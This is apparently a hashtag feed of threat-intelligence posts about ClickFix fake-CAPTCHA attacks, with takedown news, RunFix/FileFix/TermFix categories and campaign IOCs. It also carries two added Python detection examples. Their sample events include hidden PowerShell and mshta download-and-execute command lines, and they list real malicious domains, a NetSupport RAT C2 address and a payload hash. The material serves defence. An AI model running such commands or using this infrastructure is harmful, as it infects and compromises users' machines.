#clickfix

2025-07-11

In May 2025, #ESET participated in operations that largely disrupted the infrastructure of two notorious infostealers: #LummaStealer and #Danabot.
As part of the Lumma Stealer disruption effort, carried out in conjunction with Microsoft, BitSight, Lumen, Cloudflare, CleanDNS, and GMO Registry, ESET supplied technical analysis and statistical information.
Danabot was targeted by the #FBI and #DCIS, alongside #OperationEndgame led by #Europol and #Eurojust. ESET participated together with several other companies. We provided the analysis of the malware’s backend infrastructure and identified its C&C servers.
Before these takedowns, both infostealers were on the rise: in H1 2025, Lumma Stealer detections grew by 21%, while Danabot’s numbers increased by more than 50%.
For a time, Lumma Stealer was the primary payload of HTML/FakeCaptcha trojan, used in the #ClickFix social engineering attacks that we also cover in this issue of the #ESETThreatReport. In recent months, we have seen Danabot being delivered via ClickFix as well.
For more details on these two operations and on the ClickFix attacks, read the latest #ESETThreatReport: welivesecurity.com/en/eset-res

Paxion Cybersecurity @PaxionCyber
2025-07-10

🚨 ClickFix = CAPTCHA + Malware

Rhadamanthys infostealer is back, this time hiding behind fake “verify” prompts that run PowerShell.

No macros. No attachments.
👀 SMEs are targets.

@badsamurai That's basically my point. #FileFix is just #ClickFix by another name. Trying to separate the two doesn't make sense to me.

Definitely agree that your mitigation is a good way to help combat this.

Example 3: #TermFix

I rarely see this, and I haven't yet personally documented it. So I found an image from a Google search to illustrate.

This example is from a #TermFix style #ClickFix popup asking the viewer to open a PowerShell terminal.

Example of a "TermFix" style ClickFix popup asking a viewer to open a PowerShell terminal window and paste script into it.

Example 2: #FileFix

As of 2025-07-03, the #KongTuke campaign is using FileFix style #ClickFix pages to distribute whatever this campaign is distributing.

It's likely pushing #InterlockRAT based on previous discussions I've had here, but I couldn't confirm, because it didn't like me.

A "FileFix" style ClickFix page from the KongTuke campaign.

Example 1: #RunFix

As of 2025-07-03, the #SmartApeSG campaign is using RunFix style #ClickFix pages to distribute #NetSupportRAT.

Screenshot of a "RunFix" style ClickFix page from the SmartApeSG campaign.

Details of network traffic from a NetSupport RAT infection via "RunFix" style ClickFix.

#ClickFix is a social engineering technique that uses fake verification pages and clipboard hijacking to convince people to click and keyboard stroke their way to an infection. So let's categorize #FileFix properly in the pantheon of ClickFix Attacks.

FileFix: A ClickFix page that asks you to paste script into a File Manager window.

#RunFix: A ClickFix page that asks you to paste script into a Run window.

#TermFix: A ClickFix page that asks you to paste script into a terminal window (cmd.exe console or PowerShell terminal).

We cool with that? Any other types I'm missing?
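A defender-side illustration of the RunFix/FileFix distinction drawn above, added here as an example and not part of the original post. Both variants hand the pasted text to the Windows shell UI (the Run dialog or the File Explorer address bar), so the resulting process is a child of explorer.exe; the triage below runs over constructed process-creation events (the hosts, domains and paths are made up) and flags script hosts launched that way whose command line shows a download-and-run or hidden/encoded-launch indicator. TermFix, where the user opens a console and pastes there, does not produce that parent and is deliberately out of scope for this rule.

```python
import ntpath
import re

# RunFix and FileFix both hand the pasted text to the Windows shell UI (Run dialog,
# File Explorer address bar), so the resulting process is a child of explorer.exe.
SHELL_UI_PARENTS = {"explorer.exe"}

# Script hosts and download-capable Windows binaries typically named in the pasted command.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe",
}

# Indicators that the command fetches something remote and runs it, or hides/encodes its launch.
DOWNLOAD_EXEC_RE = re.compile(
    r"https?://"
    r"|\b(?:irm|iwr|iex|invoke-webrequest|invoke-restmethod|invoke-expression|downloadstring)\b"
    r"|-(?:e|ec|enc|encodedcommand)\b"
    r"|-w(?:indowstyle)?\s+hidden",
    re.IGNORECASE,
)

# Constructed sample events in a Sysmon/EDR-like shape; hosts, paths and domains are made up.
SAMPLE_EVENTS = [
    {   # RunFix-style: Run dialog -> hidden PowerShell that downloads and evaluates a script
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": 'powershell.exe -w hidden -c "irm http://lure.example.invalid/x | iex"',
    },
    {   # FileFix-style: File Explorer address bar -> mshta fetching a remote HTA
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\mshta.exe",
        "cmdline": "mshta https://lure.example.invalid/v.hta",
    },
    {   # benign: user opens a text file from Explorer
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "cmdline": r"notepad.exe C:\Users\alice\notes.txt",
    },
    {   # benign: admin shortcut runs a local script, no remote fetch and nothing hidden
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -File C:\tools\backup.ps1",
    },
    {   # not spawned by the shell UI: a developer's shell calling an API
        "parent": r"C:\Program Files\Git\usr\bin\bash.exe",
        "image": r"C:\Windows\System32\curl.exe",
        "cmdline": "curl https://api.example.invalid/health",
    },
]


def image_name(path):
    """Lower-cased file name of a Windows path, usable on any platform via ntpath."""
    return ntpath.basename(path).lower()


def triage(events):
    """Return the events that look like a pasted ClickFix command executed through the shell UI.

    TermFix (the user opens cmd.exe or PowerShell and pastes there) is out of scope for this
    parent-based rule: the pasted command runs inside an existing console, not under explorer.exe.
    """
    hits = []
    for ev in events:
        if image_name(ev["parent"]) not in SHELL_UI_PARENTS:
            continue
        if image_name(ev["image"]) not in SCRIPT_HOSTS:
            continue
        m = DOWNLOAD_EXEC_RE.search(ev["cmdline"])
        if m is None:
            continue
        hits.append({
            "variant": "RunFix/FileFix (child of the Windows shell UI)",
            "image": image_name(ev["image"]),
            "indicator": m.group(0),
            "cmdline": ev["cmdline"],
        })
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['variant']}: {hit['image']} matched {hit['indicator']!r}")
        print(f"    {hit['cmdline']}")
```

Of the five constructed events only the first two are flagged: explorer.exe launching notepad or a local PowerShell script is everyday activity, and the curl call is not a child of the shell UI at all. The parent condition is what keeps the command-line regex from firing on every developer and admin on the network.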

Are we still on about the MotW flaws? I'm not sure anyone pays attention to that anyway.

darkreading.com/endpoint-secur

#clickfix #windows

2025-07-01

"Analysis of the threat case of kimsuky group using 'ClickFix' tactic" published by Genians. #ClickFix, #Kimsuky, #DPRK, #CTI genians.co.kr/en/blog/threat_i

2025-07-01

"Analysis of the Kimsuky group threat case using the 'ClickFix' tactic" published by Genians. #ClickFix, #Kimsuky, #DPRK, #CTI genians.co.kr/blog/threat_inte

2025-06-29

Cybersecurity news for the week of 23 to 29 June 2025

All the most interesting news from the world of cybersecurity, with my comments. This week: the Ministry of Digital Development proposes banning IMEI changes, WordPress is under attack again, the Americans have banned themselves from WhatsApp, clickfix is reborn as filefix, Brother being Brother, and other only-the-most-important and interesting news from the world of information security.

habr.com/ru/articles/922166/

#информационная_безопасность #imei #wordpress #microsoft #санкции #whatsapp #clickfix #mcp #brother #kaspersky

2025-06-27 (Friday): #SmartApeSG infection chain leading to #ClickFix lure leading to #NetSupportRAT

URL sequence leading to ClickFix:

- palcomp3[.]top/sss/buf.js
- palcomp3[.]top/sss/index.php?GQX1KqUM
- palcomp3[.]top/sss/bof.js?19ec2a189848bc0bfa

URL sequence after running ClickFix script:

- camplively[.]com/all.php
- camplively[.]com/smks.zip?lap=3928

SHA256 hash for smks.zip archive containing NetSupport RAT package:

3be246afee53241eaa9c1f74d6720cc5d1004846ded378bd4b1040064b5631c5

NetSupportRAT C2: 185.163.45[.]30:443

cc: @monitorsg

Injected SmartApeSG script in page from legitimate but compromised website. This injected script leads to the ClickFix page.

Example of the ClickFix page and script injected into a victim's clipboard (clipboard hijacking) that the victim is asked to paste into Run window and run.

URL sequence for the ClickFix page and the URLs for NetSupport RAT.

Traffic from the infection filtered in Wireshark, showing the NetSupport RAT C2 traffic.

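Putting the defanged indicators from the post above to work on the defender's side, as an added example that is not part of the original post: the code refangs and classifies them (lure/download hosts, the C2 endpoint, the archive's SHA-256) and scans proxy, connection and file-hash records for matches. The indicator list is copied from the post; the log lines, the client address 10.10.4.22, the file paths and the benign control hash (SHA-256 of an empty file) are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Indicators exactly as posted above (defanged with [.]); nothing in this block is invented.
POSTED_IOCS = """
palcomp3[.]top/sss/buf.js
palcomp3[.]top/sss/index.php?GQX1KqUM
palcomp3[.]top/sss/bof.js?19ec2a189848bc0bfa
camplively[.]com/all.php
camplively[.]com/smks.zip?lap=3928
3be246afee53241eaa9c1f74d6720cc5d1004846ded378bd4b1040064b5631c5
185.163.45[.]30:443
"""

SHA256_RE = re.compile(r"^[0-9a-f]{64}$", re.IGNORECASE)
ENDPOINT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})$")
URL_IN_LOG_RE = re.compile(r"https?://\S+", re.IGNORECASE)
ENDPOINT_IN_LOG_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3}:\d{1,5})\b")


def refang(value):
    """Undo the common defanging conventions so the indicator can be compared with live logs."""
    return (value.strip()
            .replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
            .replace("hxxp://", "http://").replace("hxxps://", "https://"))


def parse_iocs(text):
    """Classify refanged indicators into hosts, C2 endpoints (ip:port) and SHA-256 hashes."""
    iocs = {"hosts": set(), "endpoints": set(), "sha256": set()}
    for raw in text.splitlines():
        value = refang(raw)
        if not value:
            continue
        if SHA256_RE.match(value):
            iocs["sha256"].add(value.lower())
        elif ENDPOINT_RE.match(value):
            iocs["endpoints"].add(value)
        else:
            # bare "host/path?query" as posted: prepend a scheme so urlsplit yields the host
            if "://" not in value:
                value = "http://" + value
            iocs["hosts"].add(urlsplit(value).hostname.lower())
    return iocs


def scan(iocs, proxy_lines, conn_lines, file_hashes):
    """Match the three indicator classes against proxy, connection and file-hash records."""
    matches = []
    for line in proxy_lines:
        for url in URL_IN_LOG_RE.findall(line):
            host = urlsplit(url).hostname
            if host and host.lower() in iocs["hosts"]:
                matches.append(("proxy", host.lower(), line))
    for line in conn_lines:
        for endpoint in ENDPOINT_IN_LOG_RE.findall(line):
            if endpoint in iocs["endpoints"]:
                matches.append(("conn", endpoint, line))
    for path, digest in file_hashes.items():
        if digest.lower() in iocs["sha256"]:
            matches.append(("file", digest.lower(), path))
    return matches


# Constructed records for the example: client address, timestamps and paths are made up.
SAMPLE_PROXY_LOG = [
    "2025-06-27T13:58:41Z 10.10.4.22 GET http://palcomp3.top/sss/index.php?GQX1KqUM 200",
    "2025-06-27T13:59:02Z 10.10.4.22 GET https://www.example.invalid/news 200",
    "2025-06-27T14:00:15Z 10.10.4.22 GET http://camplively.com/smks.zip?lap=3928 200",
]
SAMPLE_CONN_LOG = [
    "2025-06-27T14:02:00Z 10.10.4.22 -> 185.163.45.30:443 tcp",
    "2025-06-27T14:02:01Z 10.10.4.22 -> 198.51.100.7:443 tcp",
]
SAMPLE_FILE_HASHES = {
    # the posted smks.zip hash, and the SHA-256 of an empty file as a benign control
    r"C:\Users\alice\Downloads\smks.zip": "3be246afee53241eaa9c1f74d6720cc5d1004846ded378bd4b1040064b5631c5",
    r"C:\Users\alice\Downloads\empty.txt": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}


def run_example():
    return scan(parse_iocs(POSTED_IOCS), SAMPLE_PROXY_LOG, SAMPLE_CONN_LOG, SAMPLE_FILE_HASHES)


if __name__ == "__main__":
    for source, indicator, record in run_example():
        print(f"[{source}] {indicator}: {record}")
```

Matching on hostname rather than full URL is a deliberate choice: the query strings in the posted URLs look per-victim, so a full-URL match would miss the next visitor, while any request to the lure or download host is worth a look regardless of path.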
2025-06-26

ESET Threat Report H1 2025: #ClickFix attacks surge 500%, SnakeStealer tops infostealer charts, and NFC fraud jumps 35x. Plus, chaos in the ransomware underworld and a new Android adware menace—Kaleidoscope. Dive into the full report: web-assets.esetstatic.com/wls/ #ESETresearch

2025-06-20

🚨 New malware alert: Mocha Manakin uses #Clickfix (fakeCAPTCHA) to trick users into deploying a custom backdoor called NodeInitRAT. Red Canary warns it could lead to ransomware!

🔗 hackread.com/mocha-manakin-mal

#CyberSecurity #CyberAttack #fakeCAPTCHA #MochaManakin #NodeInitRAT

2025-06-18 (Wednesday): #SmartApeSG --> #ClickFix lure --> #NetSupportRAT --> #StealCv2

A #pcap of the traffic, the malware/artifacts, and some IOCs are available at malware-traffic-analysis.net/2.

Today's the 12th anniversary of my first blog post on malware-traffic-analysis.net, so I made this post a bit more old school.

HTML source of page from legitimate but compromised site showing SmartApeSG injected script.

Example of a ClickFix-style page caused by the injected SmartApeSG script. A victim must click to get the popup and follow the instructions to paste and run the malicious script.

Traffic from an infection filtered in Wireshark. This shows the NetSupport RAT C2 traffic and StealC v2 traffic.

2025-06-18

"Famous Chollima deploying Python version of GolangGhost RAT" published by CiscoTalos. #ClickFix, #FamousChollima, #PylangGhost, #DPRK, #CTI blog.talosintelligence.com/pyt

2025-06-18

📢 Malware campaign using ClickFix to deploy ARECHCLIENT2
📝 Elastic Security Labs has detected an increase in campaigns using the **ClickFix** technique, a social engineering method that tricks users into executing mal...
📖 cyberveille: cyberveille.ch/posts/2025-06-1
🌐 source: elastic.co/security-labs/a-wre
#ARECHCLIENT2 #ClickFix #Cyberveille
